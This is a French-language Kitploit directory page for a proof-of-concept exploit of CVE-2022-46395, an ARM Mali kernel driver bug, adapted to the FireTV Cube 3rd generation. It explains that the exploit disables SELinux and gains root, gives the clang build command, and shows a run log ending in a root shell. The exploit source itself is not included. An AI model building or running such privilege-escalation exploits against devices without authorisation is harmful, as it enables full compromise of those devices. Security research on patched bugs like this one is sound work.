Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE_2022_46395_Gazelle — CVE-2022-46395 Preuve de concept pour FireTV Cube 3e génération (gazelle) | Kitploit
Outils/GitHubGitHub/pro-me3us/cve_2022_46395_gazelle
Sécurité AndroidSécurité des Systèmes EmbarquésEscalade de PrivilègesExploitationExploitation de Binaires
GitHubpro-me3us/cve_2022_46395_gazelle

CVE_2022_46395_Gazelle

CVE-2022-46395 Preuve de concept pour FireTV Cube 3e génération (gazelle)

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit pour CVE-2022-46395 fonctionnant sur FireTV 3e génération Cube

Ceci est un fork du chercheur en sécurité Man Yue Mo Pixel 6 POC pour CVE-2022-46395. Lisez son analyse détaillée de la vulnérabilité ici. Des modifications ont été apportées pour tenir compte de l'espace utilisateur 32 bits de FireOS. Le POC exploite un bug dans le pilote noyau ARM Mali pour obtenir une exécution de code noyau arbitraire, qui est ensuite utilisée pour désactiver SELinux et obtenir root.

L'exploit a été corrigé dans PS7664/3772 (septembre 2023). Pour référence, la commande suivante a été utilisée pour compiler avec clang dans ndk-21 :

root@kitploit:~
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o gazelle_buf

Pour des résultats plus rapides, exécutez après un redémarrage frais. En moyenne, le POC prend 20 à 60 secondes pour obtenir root.

root@kitploit:~
gazelle:/ $ /data/local/tmp/gazelle_buf
fingerprint: Amazon/gazelle/gazelle:9/PS7652.3564N/0028488625152:user/amz-p,release-keys
benchmark_time 102
failed after 100
finished reset: 919423975 fault: 918468559 3795 err 0 read 3
found pgd at page 8
overwrite addr : 104100558 558
overwrite addr : 104300558 558
overwrite addr : 10410082c 82c
overwrite addr : 10430082c 82c
result 50
success after 128
gazelle:/ # 
Télécharger l’outil